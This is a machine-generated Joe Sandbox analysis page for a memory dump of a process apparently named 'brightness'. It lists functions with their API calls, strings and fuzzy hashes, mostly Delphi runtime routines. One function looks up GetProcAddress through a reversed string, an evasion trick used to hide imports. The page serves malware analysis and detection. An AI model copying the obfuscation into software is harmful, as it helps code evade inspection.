Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction ID: e480340bbd255d984be7eb471b6dac566773aa263c4857e350bc6b9678db8914
Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
Instruction Fuzzy Hash: 4AD05EAE31E2602AA214915A2D84DBB5BECCAC97B1F00413ABA8CC6101E2448C07DAB1

Function 028F920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 028F9210

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: LocalTime
String ID:
API String ID: 481472006-0
Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction ID: 0fe0f4cc5d7b7ae31a642f954b9003fca811c02ef7d046c5f60acdabe37629f8
Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
Instruction Fuzzy Hash: 11A01248404830418580331C0C0253431445810B20FC4874068F8842D1F91E01208193

Function 028F20C4 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290

Function 028FD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028FD29D

Part of subcall function 028FD268: GetProcAddress.KERNEL32(00000000), ref: 028FD281

Strings

VarDiv, xrefs: 028FD32F
VarNot, xrefs: 028FD2D7
VarBstrFromDate, xrefs: 028FD463
VariantChangeTypeEx, xrefs: 028FD2AB
VarIdiv, xrefs: 028FD345
VarBoolFromStr, xrefs: 028FD437
VarDateFromStr, xrefs: 028FD40B
VarI4FromStr, xrefs: 028FD3C9
VarXor, xrefs: 028FD39D
VarAnd, xrefs: 028FD371
VarSub, xrefs: 028FD303
oleaut32.dll, xrefs: 028FD298
VarMul, xrefs: 028FD319
VarMod, xrefs: 028FD35B
VarCyFromStr, xrefs: 028FD421
VarR4FromStr, xrefs: 028FD3DF
VarAdd, xrefs: 028FD2ED
VarBstrFromBool, xrefs: 028FD479
VarCmp, xrefs: 028FD3B3
VarR8FromStr, xrefs: 028FD3F5
VarBstrFromCy, xrefs: 028FD44D
VarNeg, xrefs: 028FD2C1
VarOr, xrefs: 028FD387

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 93e8174c2e8c58427c7f13207cab02d6f12c4a3cd1b81745f7961db8e26a4e45
Instruction ID: 1e1cc4f41db43c194adddb8a7237f3dc33d7936abddff68d9adeecddee72a063
Opcode Fuzzy Hash: 93e8174c2e8c58427c7f13207cab02d6f12c4a3cd1b81745f7961db8e26a4e45
Instruction Fuzzy Hash: 73410E6DE8C30C5BD284AB6D741083BB7DED654B153A0461AFB04CB784FDB0FC598A6A

Function 02906ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 02906EDE
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02906EEF
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02906EFF
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02906F0F
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02906F1F
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02906F2F
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02906F3F

Strings

CoResumeClassObjects, xrefs: 02906F29
ole32.dll, xrefs: 02906ED9
CoReleaseServerProcess, xrefs: 02906F19
CoInitializeEx, xrefs: 02906EF9
CoAddRefServerProcess, xrefs: 02906F09
CoSuspendClassObjects, xrefs: 02906F39
CoCreateInstanceEx, xrefs: 02906EE9

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
Instruction ID: c00e144a72ce29b525ec0320b89c9c4721c1d84ee4f5fa22bcd98ba7cc7e51fa
Opcode Fuzzy Hash: 38ff2a457021cd9b03dcf28e245e83e835a6f2e60eecb2a20b0210c6b276a061
Instruction Fuzzy Hash: FBF04CEDA8D354ADBB80BB7A5CC18362BADA9A06047001D35BF52955C3FBB99434CF12

Function 028F2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028F28CE

Strings

The unexpected small block leaks are:, xrefs: 028F2707
Unexpected Memory Leak, xrefs: 028F28C0
bytes: , xrefs: 028F275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
Unknown, xrefs: 028F278C
, xrefs: 028F2814
7, xrefs: 028F26A1
An unexpected memory leak has occurred. , xrefs: 028F2690
String, xrefs: 028F27A1

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Message
String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
API String ID: 2030045667-32948583
Opcode ID: ef38c1079bba3ce6b935655938c4f2654ab5d6f707c1a9e8b4942477be439c97
Instruction ID: af15a8eca840a73ba692222d665dc1b8b7613e2721e4eaccd579508dd1ae14e6
Opcode Fuzzy Hash: ef38c1079bba3ce6b935655938c4f2654ab5d6f707c1a9e8b4942477be439c97
Instruction Fuzzy Hash: 4EA1E53CB042588BDBA1AA2CCC80BD9B7E5EB09314F1441E5DE4DDB28ACB7599C5CF51

Function 028F252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON

Download Yara Rule

Strings

The unexpected small block leaks are:, xrefs: 028F2707
Unexpected Memory Leak, xrefs: 028F28C0
bytes: , xrefs: 028F275D
The sizes of unexpected leaked medium and large blocks are: , xrefs: 028F2849
, xrefs: 028F2814
7, xrefs: 028F26A1
An unexpected memory leak has occurred. , xrefs: 028F2690

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID:
String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
API String ID: 0-2723507874
Opcode ID: c6cebe4d5415243fc265e9653d5fb0d2cc1947e6225d06866ff5000d817da401
Instruction ID: 9ef8f3d4fc71775a2469e8fb0ce13e60485e2deddc8798703584e78873dac5ff
Opcode Fuzzy Hash: c6cebe4d5415243fc265e9653d5fb0d2cc1947e6225d06866ff5000d817da401
Instruction Fuzzy Hash: B971D23CA042988FDBA19A2CCC84BD8BBE5EB09314F1041E5DA4DDB28ADB7559C5CF52

Function 028FBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000000,028FC08B,?,?,00000000,00000000), ref: 028FBDF6

Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2

Strings

AMPM , xrefs: 028FC019
m/d/yy, xrefs: 028FBEC5
:mm, xrefs: 028FC029
AMPM, xrefs: 028FC00A
mmmm d, yyyy, xrefs: 028FBEF2
:mm:ss, xrefs: 028FC046

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: 87d8c83f0fb0ae423b686f6619358e21f95ffecc4f94622af3291755496eebd1
Instruction ID: c4b8ac4921e7125363eeccabf5d26a0c63f405002f0681c57283b74e8df6396a
Opcode Fuzzy Hash: 87d8c83f0fb0ae423b686f6619358e21f95ffecc4f94622af3291755496eebd1
Instruction Fuzzy Hash: E761563CB1024C5BDB84F7A8D850A9F77B7DB88304F508436A305DB745DA39DA1A8B92

Function 0290AE98 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AEB8
GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0290AECF
IsBadReadPtr.KERNEL32(?,00000004), ref: 0290AF63
IsBadReadPtr.KERNEL32(?,00000002), ref: 0290AF6F
IsBadReadPtr.KERNEL32(?,00000014), ref: 0290AF83

Strings

LoadLibraryExA, xrefs: 0290AEC5
KernelBase, xrefs: 0290AECA

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Read$HandleModule
String ID: KernelBase$LoadLibraryExA
API String ID: 2226866862-113032527
Opcode ID: 25403d11bd3ca95181c2b0185996cf394163a28d2a1c760d5b40448413175a93
Instruction ID: 5760d4f66d33d26fa79eefbd6dd9987962ccc696ac9d6a2dbc499218434e9f9b
Opcode Fuzzy Hash: 25403d11bd3ca95181c2b0185996cf394163a28d2a1c760d5b40448413175a93
Instruction Fuzzy Hash: AB313AB6A40309BFDB60DB68CCC5F5A77ACAF45769F004620EB14EB2C1D374A9508BE1

Function 028F435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,0294A7C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F4395
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,0294A7C8,?,?,0291E7A8,028F65B1,0291D30D), ref: 028F439B
GetStdHandle.KERNEL32(000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?,0294A7C8), ref: 028F43B0
WriteFile.KERNEL32(00000000,000000F5,028F43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028F4423,?,?), ref: 028F43B6
MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028F43D4

Strings

Runtime error at 00000000, xrefs: 028F438E, 028F43CD
Error, xrefs: 028F43C8

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: FileHandleWrite$Message
String ID: Error$Runtime error at 00000000
API String ID: 1570097196-2970929446
Opcode ID: 13c44eecccb67c88ef7a7838513fa0e8d928a2cafa7a97ee0f2e4bd9912d6cd9
Instruction ID: b18dffd4d8cd0dec94e34f834ef4aa3b293034712bbc52a161ef9d64d50b3e88
Opcode Fuzzy Hash: 13c44eecccb67c88ef7a7838513fa0e8d928a2cafa7a97ee0f2e4bd9912d6cd9
Instruction Fuzzy Hash: 82F0B46DAC8344B9FA50B2646C4AF6A279C6B44F61F640B06FB68E40C0C7B454C49B23

Function 028FAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 028FAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
Part of subcall function 028FAD3C: GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
Part of subcall function 028FAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E

CharToOemA.USER32(?,?), ref: 028FAEFB
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028FAF18
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF1E
GetStdHandle.KERNEL32(000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF33
WriteFile.KERNEL32(00000000,000000F4,028FAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028FAF39
LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028FAF5B
MessageBoxA.USER32(00000000,?,?,00002010), ref: 028FAF71

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 0d31958158c424360cd3f560b12e94d876c9ba7e6338354db299afbdd468d6a2
Instruction ID: f6766a8a5d414dad6ff91d29569578c5a06ac0456b3052540383ea7d53aad6c8
Opcode Fuzzy Hash: 0d31958158c424360cd3f560b12e94d876c9ba7e6338354db299afbdd468d6a2
Instruction Fuzzy Hash: 13119EBE548204BAD280FBA8CC81F9B77FDAB44310F404B15B758DA0E1EB35E9008B63

Function 028FE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE625
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE641
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028FE67A
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE6F7
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028FE710
VariantCopy.OLEAUT32(?,00000000), ref: 028FE745

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: b1ae6e2e7411cab1dc8c5d854adac4aec59a995b7ee98975465b8e40e24b801a
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: BE51E97D90122D9BCBA2DB58CC80BD9B3BDAF49300F0041D5E709E7211DA34AF858F65

Function 028F3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35BA
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F35ED
RegCloseKey.ADVAPI32(?,028F3610,00000000,?,00000004,00000000,028F3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028F3603

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 028F35B0
FPUMaskValue, xrefs: 028F35E4

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
Instruction ID: 29f17367329dc28d3b4265cd66573d649d268d68da47627fa10071634d314a51
Opcode Fuzzy Hash: d64a680c2d58bc0e9d61f9a7a873a91354b7c51bd300a35843df408d8cca54a1
Instruction Fuzzy Hash: AC01B17D944258BAFB51DBD1CD02BB977FCDB08B00F1005A2FF04D6780E678AA10DA69

Function 02908140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029081C8,?,?,00000000,00000000,?,029080E1,00000000,KernelBASE,00000000,00000000,02908108), ref: 0290818D
GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02908193
GetProcAddress.KERNEL32(?,?), ref: 029081A5

Strings

sserddAcorPteG, xrefs: 0290815B
Kernel32, xrefs: 02908188

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: Kernel32$sserddAcorPteG
API String ID: 667068680-1372893251
Opcode ID: 34c13ad17ed103de6d107fb882f243ec898de1b7e39d5e95f6844ec084792c13
Instruction ID: e2388d773744253974a208afcabd5319c71f90299ad79a052c970a1ccc23cb0f
Opcode Fuzzy Hash: 34c13ad17ed103de6d107fb882f243ec898de1b7e39d5e95f6844ec084792c13
Instruction Fuzzy Hash: 9901677CB44308AFE750EBA9D891E6E77EEFB4C704F514461F600D7691E674AD00CA25

Function 028FAA50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,028FAAE7,?,?,00000000), ref: 028FAA68

Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2

GetThreadLocale.KERNEL32(00000000,00000004,00000000,028FAAE7,?,?,00000000), ref: 028FAA98
EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 028FAAA3
GetThreadLocale.KERNEL32(00000000,00000003,00000000,028FAAE7,?,?,00000000), ref: 028FAAC1
EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 028FAACC

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

Associated: 00000004.00000002.1866051784.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866268252.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866461791.000000000294B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A3F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.1866566708.0000000002A42000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28f0000_brightness.jbxd

Similarity

API ID: Locale$InfoThread$CalendarEnum
String ID:
API String ID: 4102113445-0
Opcode ID: 7ec7d67a14fcb5a017f40e6dad9c16bf8c16e2ec269f95e11af734a67e95c95d
Instruction ID: b86e4be7db7cc74cf2fe5faf3853e83b0dc18b2a150d26f8abb4ae3441a755f1
Opcode Fuzzy Hash: 7ec7d67a14fcb5a017f40e6dad9c16bf8c16e2ec269f95e11af734a67e95c95d
Instruction Fuzzy Hash: 6601DF7C3003447BF696AA68CD11B6F736DDB86720F510260E728E67C1E6699E108A66

Function 028FAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,028FACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028FAB2F

Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2

Strings

yyyy, xrefs: 028FAC25
ggg, xrefs: 028FAC15
eeee, xrefs: 028FAC3E

Memory Dump Source

Source File: 00000004.00000002.1866087402.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true

